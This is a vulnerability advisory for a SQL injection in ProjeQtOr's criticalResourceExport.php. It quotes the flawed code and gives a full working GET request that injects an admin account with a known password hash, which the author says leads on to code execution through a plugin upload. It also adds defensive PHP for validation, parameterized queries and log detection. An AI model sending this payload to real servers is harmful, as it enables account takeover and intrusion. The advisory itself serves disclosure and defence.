CVE-2024-29386

Advisory

Software brief introduction

ProjeQtOr is open-source project management software.

https://en.wikipedia.org/wiki/ProjeQtOr
https://www.projeqtor.org/en/product-en/downloads

Vulnerability description

ProjeQtOr up to v11.2.0 was discovered to contain a SQL injection vulnerability via the component /view/criticalResourceExport.php. Exploiting this flaw leads to privilege escalation by adding a new user with known credentials and the admin role, and to remote code execution via plugin upload.

Issue

model/Affectable.php

...
class Affectable extends SqlElement {
  ...
  public static function tranformPlanningResult($scale, $start, $end) {
    ...
    $resourceTeamAffection = array();
    $resourceTeamAffRate=array();
    $idResourceTeam=array();
    $planWork=new PlannedWork();
    $tmpAss=new Assignment();
    $critPlannedWork="idProject not in ".Project::getAdminitrativeProjectList(false);
    // $start and $end originate from request parameters (see view/CriticalResourceExport.php below)
    // and are concatenated into the SQL criteria string without escaping or parameter binding.
    $critPlannedWork.=" and workDate>='$start' and workDate<='$end'";
    $lstPlanWork=$planWork->getSqlElementsFromCriteria(null, false, $critPlannedWork,null,null,true);
    $loop['ideal']=array("real"=>$arrayRealWork, "planned"=>$arrayPlannedWork);
    $loop['real']=array("real"=>$arrayRealWork, "planned"=>$lstPlanWork); // PBER : Not sure, possibly to remove back to "real"=>array()
    ...

view/CriticalResourceExport.php

...
// All five values are read from the query string of the GET request.
$scale = RequestHandler::getValue('scaleCriticalResources');
// The PoC below relies on the start/end values reaching the SQL criteria in Affectable unchanged.
$start = RequestHandler::getDatetime('startDateCriticalResources');
$end = RequestHandler::getDatetime('endDateCriticalResources');
$idProject = RequestHandler::getId('idProjectCriticalResources');
$limitedRow = RequestHandler::getNumeric('nbCriticalResourcesValue');
Affectable::getCriticalResourcePlanningResult();
Affectable::drawCriticalProjectResourceList($scale, $start, $end, $idProject, $limitedRow);
...

Steps to reproduce

  1. Login with guest:guest
  2. Send GET request to the path /view/criticalResourceExport.php?scaleCriticalResources=a&startDateCriticalResources=Injection_Here&endDateCriticalResources=Injection_Here

Proof of concept

## SQLi to create new user with admin Priv
## After connecting to new admin acc, we upload a new plugin containing RCE php shell

GET /view/criticalResourceExport.php?scaleCriticalResources=a&startDateCriticalResources=2023-02-01&endDateCriticalResources=2023-03-01'+%3b+insert+into+resource+values("4","lol",NULL,NULL,NULL,"5f4dcc3b5aa765d61d8327deb882cf99",1,0,1,0,0,NULL,NULL,NULL,NULL,1.00000,NULL,0,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,"md5",1,NULL,"2024-02-09","ab041450606933a7f4491fdc9bb9e2fd",0,NULL,NULL,NULL,NULL,0,0,0,NULL,NULL,0,0,NULL,NULL,0)+%3b+--+'%3b&idProjectCriticalResources=1&nbCriticalResourcesValue=1 HTTP/1.1
Host: localhost
sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/view/main.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=9p222uq7m4r7fvlurlpdo62s5i
If-Modified-Since: Sun, 11 Feb 2024 13:38:47 GMT
Connection: close
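The two snippets under Issue and the proof of concept above show the same defect from both ends: the date parameters are concatenated into the SQL criteria string, and a crafted endDateCriticalResources value closes the quoted literal. The following PHP is an added example and not ProjeQtOr's own code. It shows a strict date validator that rejects such values, a parameterized replacement for the workDate criterion, and the same validator applied to constructed access-log lines to flag requests of the PoC's shape. The $pdo handle, the base query text and the log lines are assumptions made for the example.

```php
<?php
// Added example, not ProjeQtOr code. (1) Strict validation of the two date
// parameters that view/CriticalResourceExport.php hands to Affectable, where
// they are interpolated into SQL; (2) a bound-parameter replacement for the
// criterion; (3) the validator reused to flag PoC-shaped requests in a log.
// The log lines further down are constructed, not real traffic.

/** Return the value normalized to 'Y-m-d H:i:s', or null if it is not a plain date/datetime. */
function strictDatetime(?string $value): ?string
{
    if ($value === null) {
        return null;
    }
    $value = trim($value);
    foreach (['Y-m-d H:i:s', 'Y-m-d'] as $format) {
        // '!' resets unspecified fields, so a bare 'Y-m-d' yields midnight.
        $dt = DateTimeImmutable::createFromFormat('!' . $format, $value);
        // createFromFormat rolls over out-of-range days (2023-02-30 -> 2023-03-02);
        // the round trip rejects that as well as any trailing characters.
        if ($dt !== false && $dt->format($format) === $value) {
            return $dt->format('Y-m-d H:i:s');
        }
    }
    return null;
}

/**
 * Hardened replacement for the interpolated criteria string: the date bounds
 * travel as bound parameters, so the SQL text never contains user input.
 * Returns [sqlFragment, params] for PDOStatement::execute().
 */
function plannedWorkDateCriteria(string $start, string $end): array
{
    return [
        ' and workDate >= :start and workDate <= :end',
        [':start' => $start, ':end' => $end],
    ];
}

/** Return the access-log lines whose date parameters fail strict validation. */
function suspiciousExportRequests(array $logLines): array
{
    $hits = [];
    foreach ($logLines as $line) {
        if (!preg_match('#"GET (/view/criticalResourceExport\.php\?[^ "]*)#i', $line, $m)) {
            continue;
        }
        $query = parse_url($m[1], PHP_URL_QUERY) ?? '';
        parse_str($query, $params); // URL-decodes, so %27 and + become ' and space
        foreach (['startDateCriticalResources', 'endDateCriticalResources'] as $name) {
            if (isset($params[$name]) && strictDatetime($params[$name]) === null) {
                $hits[] = $line;
                break;
            }
        }
    }
    return $hits;
}

// --- validator on constructed inputs --------------------------------------
$samples = [
    '2023-03-01',
    '2023-03-01 12:30:00',
    '2023-02-30',
    "2023-03-01' ; insert into resource values(...) ; -- '",
];
foreach ($samples as $s) {
    printf("%-55s => %s\n", $s, strictDatetime($s) ?? 'REJECTED');
}

// --- hardened criteria in place of "and workDate>='$start' and workDate<='$end'"
$start = strictDatetime($_GET['startDateCriticalResources'] ?? '2023-02-01');
$end   = strictDatetime($_GET['endDateCriticalResources'] ?? '2023-03-01');
if ($start === null || $end === null) {
    http_response_code(400);
    exit("invalid date range\n");
}
[$fragment, $params] = plannedWorkDateCriteria($start, $end);
// $pdo is an assumed PDO handle; the table and base criteria are whatever the caller builds.
// $stmt = $pdo->prepare('select * from <table> where idProject not in (...)' . $fragment);
// $stmt->execute($params);
echo $fragment, "\n";

// --- detection over constructed access-log lines ---------------------------
$log = [
    '127.0.0.1 - - [11/Feb/2024:13:40:01 +0000] "GET /view/criticalResourceExport.php?scaleCriticalResources=week&startDateCriticalResources=2023-02-01&endDateCriticalResources=2023-03-01&idProjectCriticalResources=1&nbCriticalResourcesValue=1 HTTP/1.1" 200 5120',
    '127.0.0.1 - - [11/Feb/2024:13:41:07 +0000] "GET /view/criticalResourceExport.php?scaleCriticalResources=a&startDateCriticalResources=2023-02-01&endDateCriticalResources=2023-03-01%27+%3b+insert+into+resource+values(%22x%22)+%3b+--+%27%3b&idProjectCriticalResources=1 HTTP/1.1" 200 5120',
];
foreach (suspiciousExportRequests($log) as $hit) {
    echo "SUSPICIOUS: ", $hit, "\n";
}
```

Run from the command line with `php example.php`; the first log line passes, the second (the PoC's shape) is reported. Binding the dates as parameters removes the injection regardless of validation, so the validator is defence in depth and, on the logging side, a cheap signal for the same endpoint.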

Timeline (DD-MM-YYYY)

  • 10-01-2024: Vulnerability identified
  • 14-02-2024: 1st vendor contact attempt via email
  • 05-03-2024: 2nd vendor contact attempt via email
  • 10-03-2024: 3rd vendor contact attempt via website forum
  • 12-03-2024: CVE requested
  • 24-03-2024: CVE assigned
  • 04-04-2024: CVE publication requested

Conclusion

I discovered the issue during my journey at Mazars Cybersecurity as an application security consultant. The product owner was notified, following their security policy, via email and the public forum of the website, but didn't respond.